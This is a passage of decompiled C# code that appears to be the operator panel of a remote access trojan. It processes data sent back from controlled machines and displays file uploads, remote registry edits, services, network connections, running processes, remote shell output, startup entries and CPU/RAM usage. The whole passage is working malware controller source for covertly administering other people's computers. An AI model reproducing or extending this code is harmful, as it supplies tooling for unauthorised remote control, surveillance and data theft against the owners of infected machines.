                        }
                        break;
                    }
                case "UploadInfo":
                    {
                        Manager FM4 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (FM4 == null)
                        {
                            break;
                        }
                        string dwid4 = unpack_msgpack.ForcePathObject("UPID").AsString;
                        int Index4 = int.Parse(unpack_msgpack.ForcePathObject("Index").AsString);
                        int sizeByte = int.Parse(unpack_msgpack.ForcePathObject("Size").AsString);
                        Control[] temp4 = FM4.LayoutPanelDownload.Controls.Find("Upload:" + dwid4, searchAllChildren: true);
                        if (temp4.Length == 0)
                        {
                            break;
                        }
                        UploadUserControl1 uc6 = (UploadUserControl1)FM4.LayoutPanelDownload.Controls[Index4];
                        try
                        {
                            lock (uc6.SyncLock)
                            {
                                uc6.Progss.Value = Convert.ToInt32(sizeByte);
                                uc6.TitleForm.Text = "(" + Methods.BytesToString(uc6.SizeFile) + "\\" + Methods.BytesToString(sizeByte) + ") Uploading...";
                                if (sizeByte >= uc6.SizeFile)
                                {
                                    uc6.TitleForm.Text = "(" + Methods.BytesToString(sizeByte) + ") Uploaded";
                                    uc6.TitleForm.ForeColor = Color.LimeGreen;
                                    uc6.Progss.Value = 0;
                                    uc6.IsRunning = false;
                                }
                            }
                        }
                        catch
                        {
                            uc6.IsRunning = false;
                            uc6.TitleForm.Text = "( 1 Error ) A failure occurred while uploading the file\r\n!";
                            uc6.TitleForm.ForeColor = Color.Red;
                        }
                        break;
                    }
                case "UploadReady":
                    {
                        Manager FM = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (FM == null)
                        {
                            break;
                        }
                        string dwid = unpack_msgpack.ForcePathObject("UPID").AsString;
                        int Index = int.Parse(unpack_msgpack.ForcePathObject("Index").AsString);
                        Control[] temp2 = FM.LayoutPanelDownload.Controls.Find("Upload:" + dwid, searchAllChildren: true);
                        if (temp2.Length != 0)
                        {
                            UploadUserControl1 uc4 = (UploadUserControl1)FM.LayoutPanelDownload.Controls[Index];
                            try
                            {
                                uc4.IsRunning = true;
                                uc4.WaitingDownload.Visible = false;
                                uc4.Client = client;
                                await uc4.Upload(Index, dwid);
                            }
                            catch
                            {
                                uc4.IsRunning = false;
                                uc4.TitleForm.Text = "( 0 Error ) A failure occurred while uploading the file\r\n!";
                                uc4.TitleForm.ForeColor = Color.Red;
                            }
                        }
                        break;
                    }
            }
        }
        catch
        {
        }
    }

    private List<ListViewItem> GetFolders(MsgPack unpack_msgpack, ListViewGroup listViewGroup)
    {
        string[] array = unpack_msgpack.ForcePathObject("Folder").AsString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
        List<ListViewItem> list = new List<ListViewItem>();
        int num = 0;
        int num2;
        for (num2 = 0; num2 <= array.Length - 1; num2++)
        {
            if (array[num2].Length > 0)
            {
                ListViewItem listViewItem = new ListViewItem
                {
                    Text = array[num2],
                    ToolTipText = array[num2 + 1]
                };
                listViewItem.SubItems.Add(array[num2 + 2]);
                listViewItem.SubItems.Add("Folder");
                listViewItem.SubItems.Add("");
                listViewItem.Group = listViewGroup;
                listViewItem.ImageIndex = 0;
                list.Add(listViewItem);
                num++;
            }
            num2 += 2;
        }
        return list;
    }

    private List<ListViewItem> GetFiles(MsgPack unpack_msgpack, ListViewGroup listViewGroup, ImageList imageList1)
    {
        string[] Files = unpack_msgpack.ForcePathObject("File").AsString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
        List<ListViewItem> list = new List<ListViewItem>();
        for (int i = 0; i <= Files.Length - 1; i++)
        {
            if (Files[i].Length > 0)
            {
                ListViewItem listViewItem = new ListViewItem
                {
                    Text = Path.GetFileName(Files[i]),
                    ToolTipText = Files[i + 1]
                };
                Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(Files[i + 2])));
                Program.Silver.Invoke((MethodInvoker)delegate
                {
                    imageList1.Images.Add(Files[i + 1], im);
                });
                listViewItem.ImageKey = Files[i + 1];
                listViewItem.Group = listViewGroup;
                listViewItem.SubItems.Add(Files[i + 3]);
                FileInfo fileInfo = new FileInfo(Files[i]);
                string text = Methods.FilesType(fileInfo.Extension);
                listViewItem.SubItems.Add(text);
                listViewItem.SubItems.Add(Methods.BytesToString(Convert.ToInt64(Files[i + 5])));
                list.Add(listViewItem);
            }
            i += 5;
        }
        return list;
    }

    public void AddToListInfo(string IDForm, Guna2DataGridView DGV, bool State, string Msg)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + IDForm];
            if (manager != null && manager.Client != null)
            {
                DataGridViewRow dataGridViewRow = new DataGridViewRow
                {
                    Height = 18
                };
                dataGridViewRow.Cells.Add(new DataGridViewImageCell
                {
                    Value = (State ? Resources.SuccessNotif : Resources.ErrorNotif),
                    ImageLayout = DataGridViewImageCellLayout.Zoom
                });
                dataGridViewRow.Cells.Add(new DataGridViewTextBoxCell
                {
                    Value = Msg
                });
                DataGridViewCell dataGridViewCell = dataGridViewRow.Cells[2];
                dataGridViewCell.Style.ForeColor = Color.Green;
                DGV.Rows.Insert(0, dataGridViewRow);
            }
        }
        catch
        {
        }
    }

    public void AddToListLogs(string IDForm, Guna2DataGridView DGV, bool State, string Msg)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + IDForm];
            if (manager != null && manager.Client != null)
            {
                DataGridViewRow dataGridViewRow = new DataGridViewRow
                {
                    Height = 24
                };
                dataGridViewRow.Cells.Add(new DataGridViewImageCell
                {
                    Value = (State ? Resources.SuccessNotif : Resources.ErrorNotif),
                    ImageLayout = DataGridViewImageCellLayout.Zoom
                });
                dataGridViewRow.Cells.Add(new DataGridViewTextBoxCell
                {
                    Value = Msg
                });
                DataGridViewCell dataGridViewCell = dataGridViewRow.Cells[1];
                if (State)
                {
                    dataGridViewCell.Style.ForeColor = Color.Green;
                }
                else if (!State)
                {
                    dataGridViewCell.Style.ForeColor = Color.Red;
                }
                else
                {
                    dataGridViewCell.Style.ForeColor = Color.Black;
                }
                DGV.Rows.Insert(0, dataGridViewRow);
            }
        }
        catch
        {
        }
    }

    public void RegManager(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            switch (unpack_msgpack.ForcePathObject("Command2").AsString)
            {
                case "RenameValue":
                    {
                        Manager manager2 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager2 != null)
                        {
                            string asString2 = unpack_msgpack.ForcePathObject("keyPath").AsString;
                            string asString3 = unpack_msgpack.ForcePathObject("OldValueName").AsString;
                            string asString4 = unpack_msgpack.ForcePathObject("NewValueName").AsString;
                            manager2.RenameValue(asString2, asString3, asString4);
                        }
                        break;
                    }
                case "DeleteValue":
                    {
                        Manager manager6 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager6 != null)
                        {
                            string asString10 = unpack_msgpack.ForcePathObject("keyPath").AsString;
                            string asString11 = unpack_msgpack.ForcePathObject("ValueName").AsString;
                            manager6.DeleteValue(asString10, asString11);
                        }
                        break;
                    }
                case "DeleteKey":
                    {
                        Manager manager7 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager7 != null)
                        {
                            string asString12 = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                            string asString13 = unpack_msgpack.ForcePathObject("KeyName").AsString;
                            manager7.DeleteKey(asString12, asString13);
                        }
                        break;
                    }
                case "LoadKey":
                    {
                        Manager manager4 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager4 != null)
                        {
                            string asString6 = unpack_msgpack.ForcePathObject("RootKey").AsString;
                            byte[] asBytes3 = unpack_msgpack.ForcePathObject("Matches").GetAsBytes();
                            manager4.AddKeys(asString6, DeSerializeMatches(asBytes3));
                        }
                        break;
                    }
                case "RenameKey":
                    {
                        Manager manager8 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager8 != null)
                        {
                            string asString14 = unpack_msgpack.ForcePathObject("rootKey").AsString;
                            string asString15 = unpack_msgpack.ForcePathObject("oldName").AsString;
                            string asString16 = unpack_msgpack.ForcePathObject("newName").AsString;
                            manager8.RenameKey(asString14, asString15, asString16);
                        }
                        break;
                    }
                case "CreateValue":
                    {
                        Manager manager5 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager5 != null)
                        {
                            string asString7 = unpack_msgpack.ForcePathObject("keyPath").AsString;
                            string asString8 = unpack_msgpack.ForcePathObject("Kindstring").AsString;
                            string asString9 = unpack_msgpack.ForcePathObject("newKeyName").AsString;
                            RegistryValueKind kind = RegistryValueKind.None;
                            switch (asString8)
                            {
                                case "11":
                                    kind = RegistryValueKind.QWord;
                                    break;
                                case "-1":
                                    kind = RegistryValueKind.None;
                                    break;
                                case "7":
                                    kind = RegistryValueKind.MultiString;
                                    break;
                                case "4":
                                    kind = RegistryValueKind.DWord;
                                    break;
                                case "0":
                                    kind = RegistryValueKind.Unknown;
                                    break;
                                case "1":
                                    kind = RegistryValueKind.String;
                                    break;
                                case "2":
                                    kind = RegistryValueKind.ExpandString;
                                    break;
                                case "3":
                                    kind = RegistryValueKind.Binary;
                                    break;
                            }
                            RegistrySeeker.RegValueData regValueData = new RegistrySeeker.RegValueData();
                            regValueData.Name = asString9;
                            regValueData.Kind = kind;
                            regValueData.Data = new byte[0];
                            manager5.CreateValue(asString7, regValueData);
                        }
                        break;
                    }
                case "ChangeValue":
                    {
                        Manager manager3 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager3 != null)
                        {
                            string asString5 = unpack_msgpack.ForcePathObject("keyPath").AsString;
                            byte[] asBytes2 = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
                            manager3.ChangeValue(asString5, DeSerializeRegValueData(asBytes2));
                        }
                        break;
                    }
                case "CreateKey":
                    {
                        Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager != null)
                        {
                            string asString = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                            byte[] asBytes = unpack_msgpack.ForcePathObject("Match").GetAsBytes();
                            manager.CreateNewKey(asString, DeSerializeMatch(asBytes));
                        }
                        break;
                    }
            }
        }
        catch
        {
        }
    }

    public static RegistrySeeker.RegSeekerMatch[] DeSerializeMatches(byte[] bytes)
    {
        using MemoryStream source = new MemoryStream(bytes);
        return Serializer.Deserialize<RegistrySeeker.RegSeekerMatch[]>((Stream)source);
    }

    public static RegistrySeeker.RegSeekerMatch DeSerializeMatch(byte[] bytes)
    {
        using MemoryStream source = new MemoryStream(bytes);
        return Serializer.Deserialize<RegistrySeeker.RegSeekerMatch>((Stream)source);
    }

    public static RegistrySeeker.RegValueData DeSerializeRegValueData(byte[] bytes)
    {
        using MemoryStream source = new MemoryStream(bytes);
        return Serializer.Deserialize<RegistrySeeker.RegValueData>((Stream)source);
    }

    private static void Service(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
            if (manager != null)
            {
                manager.ListServices.Rows.Clear();
                manager.Admin = bool.Parse(unpack_msgpack.ForcePathObject("Admin").AsString);
                string asString = unpack_msgpack.ForcePathObject("Message").AsString;
                string[] array = asString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
                int num;
                for (num = 0; num <= array.Length - 1; num++)
                {
                    if (array[num].Length > 0)
                    {
                        manager.ListServices.Rows.Add(manager.ImageListServices.Images[array[num + 4] + ".png"], array[num], array[num + 1], array[num + 3], array[num + 2]);
                    }
                    num += 4;
                }
            }
            else
            {
                client.Disconnected();
            }
        }
        catch
        {
        }
    }

    private static void TcpConnect(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
            if (manager != null)
            {
                manager.ListConnection.Rows.Clear();
                string asString = unpack_msgpack.ForcePathObject("Message").AsString;
                string[] array = asString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
                int num;
                for (num = 0; num <= array.Length - 1; num++)
                {
                    if (array[num].Length > 0)
                    {
                        manager.ListConnection.Rows.Add(manager.imageList_0.Images[CheckState(array[num + 4]) + ".png"], array[num], array[num + 1], array[num + 3], array[num + 2], array[num + 4]);
                    }
                    num += 4;
                }
            }
            else
            {
                client.Disconnected();
            }
        }
        catch
        {
        }
    }

    private static string CheckState(string Txt)
    {
        string text = "Closed";
        string text2 = "Listen";
        string text3 = "Sent";
        string text4 = "Received";
        string text5 = "Established";
        string text6 = "Closeing";
        if (Txt.Contains(text) || Txt == text)
        {
            return text;
        }
        if (Txt.Contains(text2) || Txt == text2)
        {
            return text2;
        }
        if (Txt.Contains(text3) || Txt == text3)
        {
            return text3;
        }
        if (Txt.Contains(text4) || Txt == text4)
        {
            return text4;
        }
        if (Txt.Contains(text5) || Txt == text5)
        {
            return text5;
        }
        if (Txt.Contains(text6) || Txt == text6)
        {
            return text6;
        }
        return "Other";
    }

    private static void TaskManager(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
            if (manager != null)
            {
                manager.ListProcess.Rows.Clear();
                string asString = unpack_msgpack.ForcePathObject("Message").AsString;
                string[] array = asString.Split(new string[1] { "-=>" }, StringSplitOptions.None);
                int num;
                for (num = 0; num <= array.Length - 1; num++)
                {
                    if (array[num].Length > 0)
                    {
                        string text = array[num];
                        string fileName = Path.GetFileName(text);
                        string text2 = array[num + 1];
                        Image image = Image.FromStream(new MemoryStream(Convert.FromBase64String(array[num + 2])));
                        if (manager == null)
                        {
                            break;
                        }
                        manager.ListProcess.Rows.Add(image, fileName, text2, text);
                    }
                    num += 2;
                }
            }
            else
            {
                client.Disconnected();
            }
        }
        catch
        {
        }
    }

    private static void Shell(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
            if (manager != null)
            {
                manager.BoxCmd.AppendText(unpack_msgpack.ForcePathObject("ReadInput").AsString);
                manager.BoxCmd.SelectionStart = manager.BoxCmd.TextLength;
                manager.BoxCmd.ScrollToCaret();
            }
            else
            {
                client.Disconnected();
            }
        }
        catch
        {
        }
    }

    public void Startup(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
            if (manager == null)
            {
                client.Disconnected();
                return;
            }
            manager.Admin = bool.Parse(unpack_msgpack.ForcePathObject("Admin").AsString);
            manager.ListStartup.Items.Clear();
            string[] array = Strings.Split(unpack_msgpack.ForcePathObject("Message").AsString, "\r\n");
            string[] array2 = array;
            foreach (string text in array2)
            {
                if (text.StartsWith("%CU_RUN%"))
                {
                    string[] array3 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem = new ListViewItem
                    {
                        Text = array3[1]
                    };
                    listViewItem.SubItems.Add(array3[2]);
                    listViewItem.ImageIndex = 0;
                    listViewItem.Group = manager.ListStartup.Groups["Group1"];
                    manager.ListStartup.Items.Add(listViewItem);
                }
                else if (text.StartsWith("%CU_ONCE%"))
                {
                    string[] array4 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem2 = new ListViewItem
                    {
                        Text = array4[1]
                    };
                    listViewItem2.SubItems.Add(array4[2]);
                    listViewItem2.ImageIndex = 0;
                    listViewItem2.Group = manager.ListStartup.Groups["Group2"];
                    manager.ListStartup.Items.Add(listViewItem2);
                }
                else if (text.StartsWith("%CU_EXPLO%"))
                {
                    string[] array5 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem3 = new ListViewItem
                    {
                        Text = array5[1]
                    };
                    listViewItem3.SubItems.Add(array5[2]);
                    listViewItem3.ImageIndex = 0;
                    listViewItem3.Group = manager.ListStartup.Groups["Group3"];
                    manager.ListStartup.Items.Add(listViewItem3);
                }
                else if (text.StartsWith("%MA_RUN%"))
                {
                    string[] array6 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem4 = new ListViewItem
                    {
                        Text = array6[1]
                    };
                    listViewItem4.SubItems.Add(array6[2]);
                    listViewItem4.ImageIndex = 0;
                    listViewItem4.Group = manager.ListStartup.Groups["Group4"];
                    manager.ListStartup.Items.Add(listViewItem4);
                }
                else if (text.StartsWith("%MA_ONCE%"))
                {
                    string[] array7 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem5 = new ListViewItem
                    {
                        Text = array7[1]
                    };
                    listViewItem5.SubItems.Add(array7[2]);
                    listViewItem5.ImageIndex = 0;
                    listViewItem5.Group = manager.ListStartup.Groups["Group5"];
                    manager.ListStartup.Items.Add(listViewItem5);
                }
                else if (text.StartsWith("%MA_EXPLO%"))
                {
                    string[] array8 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem6 = new ListViewItem
                    {
                        Text = array8[1]
                    };
                    listViewItem6.SubItems.Add(array8[2]);
                    listViewItem6.ImageIndex = 0;
                    listViewItem6.Group = manager.ListStartup.Groups["Group6"];
                    manager.ListStartup.Items.Add(listViewItem6);
                }
                else if (text.StartsWith("%FOLD_UP%"))
                {
                    string[] array9 = Strings.Split(text, "-=>");
                    ListViewItem listViewItem7 = new ListViewItem
                    {
                        Text = array9[1]
                    };
                    listViewItem7.SubItems.Add(Methods.BytesToString(long.Parse(array9[2])));
                    if (listViewItem7.Text == "desktop.ini")
                    {
                        listViewItem7.ImageIndex = 2;
                    }
                    else
                    {
                        listViewItem7.ImageIndex = 1;
                    }
                    listViewItem7.Group = manager.ListStartup.Groups["Group7"];
                    manager.ListStartup.Items.Add(listViewItem7);
                }
            }
        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.ToString());
        }
    }

    public void Performance(Clients client, MsgPack unpack_msgpack)
    {
        try
        {
            switch (unpack_msgpack.ForcePathObject("Command2").AsString)
            {
                case "Data":
                    {
                        Manager manager3 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager3 != null)
                        {
                            manager3.CPU.Text = unpack_msgpack.ForcePathObject("CPU").AsString;
                            manager3.RAM.Text = unpack_msgpack.ForcePathObject("RAM").AsString;
                            manager3.bunifuLabel_0.Text = unpack_msgpack.ForcePathObject("CountCPUS").AsString;
                            manager3.TimeSystem.Text = unpack_msgpack.ForcePathObject("TimeSystem").AsString + "Minutes";
                        }
                        else
                        {
                            client.Disconnected();
                        }
                        break;
                    }
                case "Stop":
                    {
                        Manager manager2 = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager2 != null)
                        {
                            manager2.PowerPerformance.Enabled = true;
                            manager2.PowerPerformance.Text = "Start";
                            manager2.CPU.Text = "0%";
                            manager2.RAM.Text = "0";
                            manager2.bunifuLabel_0.Text = "0";
                            manager2.TimeSystem.Text = "0";
                        }
                        else
                        {
                            client.Disconnected();
                        }
                        break;
                    }
                case "Start":
                    {
                        Manager manager = (Manager)Application.OpenForms["Manager:" + unpack_msgpack.ForcePathObject("ID").AsString];
                        if (manager != null)
                        {
                            manager.PowerPerformance.Enabled = true;
                            manager.PowerPerformance.Text = "Stop";
                        }
                        else
                        {
                            client.Disconnected();
                        }
                        break;
                    }
            }
        }
        catch
        {
        }
    }
}
